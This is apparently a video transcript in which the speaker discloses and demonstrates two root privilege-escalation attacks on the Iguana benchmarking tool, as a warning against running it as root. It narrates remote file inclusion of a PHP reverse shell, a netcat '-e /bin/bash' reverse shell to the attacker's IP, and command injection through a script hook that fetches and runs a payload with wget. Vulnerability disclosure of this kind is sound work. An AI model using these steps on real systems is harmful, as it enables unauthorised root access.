Hi, how's it going? This is Felix, and today I will present you two vulnerabilities of Iguana. First one, I will show you why you should never run the demonized Iguana as root or any non-restrictive user. The first exploit uses the fact that Iguana supports command line triple stores. Thus, we can execute unrestricted scripts on the server machine. The second exploit is using the script hooks of Iguana. These hooks were actually implemented to automatize a benchmark completely without a bash script. However, these scripts can be used to exploit Iguana. We look at two different scenarios. In the first one, we got a low-privilege reverse shell as a default Apache server user www-data, and Iguana is run as root, or any more privileged user for that matter. So basically, we are looking at a scenario where we got a shell on the server from outside and try to gain a higher privileged user. This is pretty common. We then exploit the command line triple store execution. The second exploit will show what happens if you run rev.php on the default mode, which won't restrict the access to only local hosts, so you can access rev.php from outside the server. Thus we can send an Iguana config from an external server and first exploit Iguana using remote file inclusion, and afterwards, with the same exploit, we execute the reverse shell we put on the server. In this scenario, we will use the script hook exploit. However, both exploit would work equally well on both scenarios. So let's start with the first exploit. As I've mentioned before, we use remote file inclusion to get a low privilege user shell at the server, and then we use Iguana to privilege escalate. So let's first, I prepared something. In a folder we have our rev.php. This is the file we want to get into the server to execute. So we get our remote shell. So let's do this by starting a small Python server, so the other system can access it. By the way, we are at IP 192.168.2.112. The target is at 111. And let's clear it up. And let's make our listener, which is at port 7676. And on the target, Apache servers running, and we can look at it. Nothing there, but if we use like parameter post equals post.txt, we can see the site is vulnerable to local file inclusion and remote file inclusion. So what we can do now is use our server, our Python server, which is at port 8000, and our file rev.php. Let's analyze that, and we have our shell. Great. Let's make this to a real shell, because otherwise I hate it. Import PTI. Let's make this a little bit smaller. PTI spawn. This has nothing to do with the Iguana exploit, it's just a more convenient bash. We will use. Okay. Yeah. Term equals xterm minus color. Yeah, cool. So let's go into the directory. We can. No, we don't have to. We are at. Let's look if Iguana is running. Sorry. It's ps minus if grab iguana dot. Yeah, Iguana's running as root, so we can overtake this. What we have to do is, let's this up, we have to send a configuration. So what we want is, let's go to temp. Yeah. Close up and get first the Iguana release. So we have the send config. Location. Paste. It's wget and the link. Sorry. but I put wget in, so let's get the iguana release there, and then we have to get the benchmark configuration. Cool. Let's go this up. Let's unzip iguana release.zip. Cool. And because I want to have auto-completion, echo. Always forget which one. I think it's this. Yes, it's cool. Clear. Alas. Yeah, so we can now send our config, so let's create one. Let's use the basic configuration, and we can adjust it to get our second ref shell as root. So go to raw, copy paste. This can be minimalized, paste. And what we want to change is first our payload, which is the endpoint server, as we are using command line triple stores. We have a script running here, so we can use bin. Netcat is on a machine, that's quite useful. Otherwise, use a ref shell you want to use. In our case, we can use netcat 168.2.112, and we want to port 778 -e/bin/bash. So this is our payload, and then we have to adjust the Spark worker configuration seen here. So first thing, we have a CLI input worker, not a Spark worker. Second, we can't use temp here, but we can use def null. Def null. This is the working. Then we have to put random. This is just we need 3 strings. Won't go into detail here, but the CLI input worker needs these 2 things as a constructor argument. So let's give them. Yeah, that's it. Now we can send our config after we created another listener at 7878. So let's start the config, and we should have a ref shell. Who are we? We are root. Amazing. So yeah, cool. So this is the first exploit, and now we're going to the second exploit. So let's exit. Let's make a new shell, because like as soon as I use stt raw -echo, I have no clue how to get out of there. It's just more convenient. Okay, so let's use the second exploit. RabbitMQ is a default mode running on every IP on the target machine. However, you have to specify loopback user equals something. We can look that up if the exploit works. To disable authentication, so this exploit can work properly. However, if you have the authentication, you can adjust the send config script and basically send the authentication with it, and the exploit still works. It's just if you have the authentication for RabbitMQ, then you can do it. Otherwise, maybe it allows guest mode, and then we can just access. And we have defined it that we can have we have guest authentication, so we can just exit it, access RabbitMQ. Sorry. So let's do this. So we're going into Iguana. I didn't download it. No, I didn't download. Did I? Yeah, I already did download the Iguana release. Sorry, Iguana release. Unzip Iguana release, and now we have to adjust let's go into the Iguana release folder, this up, and now let's start tmux. Now we have to adjust the send config script, because we are not on localhost anymore, but we are want to send to one night 168 211. Yeah. Great. Okay, let's split the screens. Is Python server still running? I don't think so. Yeah, it's still running. Cool. So we don't have to start that. That's fine. We can exit this one. Nah. Yeah, we can exit this one. And cool. We still need our benchmark configuration. So again, let's copy paste it. The bench config, insert, paste. So this one is a little bit different because we still use the Sparkle config 1. We use time limit. Oh, I didn't change that. I might have to pause the video and wait till the benchmark finished. Not sure about that because I didn't change it to like a second. It's 1 hour. So there may be a cut. You will see it, and if so, don't worry. It's just because I forgot to adjust the time limit in the previous in the previous exploit. So it might be that Iguana is running the whole benchmark for 1 hour, even though there are no queries, which would be kind of annoying. But again, no worries. Just there will probably just then be a cut. So let's /def/null. That's okay. That's okay. Now we have a prescript hook in Iguana, and this is explained in the wiki at configuration. And at the end, yeah, here. This one, copy it, and we put it in here. And yeah, this is basically executing a hook before every test case. So let's use it. And as we only have one argument, because what it will do is put the dataset name after we get here the dataset name, and after that the connection name, and after that the task ID. However, we have, so the task ID won't compromise the whole script execution. We have to, end the line there. We can do this with like a semicolon. We can do this with a hash. I guess a pipe would work too. But for now, let's use a semicolon. I hope that works. And the dataset name will be http://192.168.2.112 port is 8000 rev.php. So we put our rev.php in the Iguana working directory. Wget. That should be fine. Cool. Save that, and I guess we can send to config. No, we don't have to start a listener right now. Seemed to work, I hope. We will see if the previous benchmark is running still. If we can obtain a ref shell, otherwise again there will be cut. So let's use 7979. No, 7676 is the rev.php shell. And no, it's this one. And let's use the second stage. Now we have our rev.php file there. So what we can do is pretty easy. As we're in the working directory, input ref, and use PHP. And this, will execute the ref shell. So let's save that. Send the config again. I hope this works. No. So there will be cut. And we see each other probably right now. We got a ref shell. I had to restart Iguana. The previous benchmark caused Iguana to crash because I forgot with the def null part, Iguana will crash, which is in the previous exploit not a problem. But if you want to use it afterwards, it is a problem. So I will show you what you can do to avoid that. For now, we got our ref shell. I probably leave the Kali part in where I just restart Iguana. Yeah, it's actually I just restarted Iguana, so that's, yeah. Yeah, we are root again, and which is the IP address? Yeah, we are root on the server again. Great. Let's look at the file I mentioned, the rabbitmq config, rabbitmq, rabbitmq.conf. Yeah, this is the line which has to be there to make it work without authentication. Again, if you have authentication in rabbitmq, if the authentication is leaked, it still works. So you just have to adjust a little bit. However, these other those exploits, and I will show you. I will exit this one. Cool. I will show you what you can do in the config to avoid crashing it. And it should be pretty simple, because instead of def0, you can just say so still have this path still has to exist, the queries part. But what you can do is change the number of simulated workers to 0, and you should be fine, because the for loop won't be triggered, and those, yeah, it won't have to execute anything. Amazing. So that's it. I hope you enjoyed the video, and yeah, have fun benchmarking, I guess. See ya!